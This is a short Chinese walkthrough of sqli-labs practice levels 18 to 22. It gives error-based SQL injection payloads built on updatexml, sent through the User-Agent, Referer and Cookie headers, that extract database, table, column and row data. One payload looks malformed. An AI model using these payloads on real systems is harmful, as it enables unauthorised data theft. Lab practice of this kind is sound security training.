标签：less lq concat updatexml table 靶场 select

less-18

user-agent注入

' and updatexml(1,concat('~',(select database()),'~'),1),1,1,) -- lq 

 

 

less-19

'or updatexml(1,concat(0x7e,(database())),1) and '1'='1

referer参数注入

 

 

less-20 cookie注入

 

' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) -- lq      判断表名

' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~'),1) -- lq            判断字段名

' and updatexml(1,concat('~',(select id from security.emails limit 0,1),'~'),1) -- lq  表中数据

 less-21 based64编码(注释符绕过)

将sql语句采用based64编码加密注入

 

 

 

 报错了。提示单引号有错，采用过滤符绕过

 

 

 

 less-22与前一题一样采用闭合方式为双引号闭合

 

标签：less,lq,concat,updatexml,table,靶场,select
来源： https://www.cnblogs.com/scjinjiang/p/16356801.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。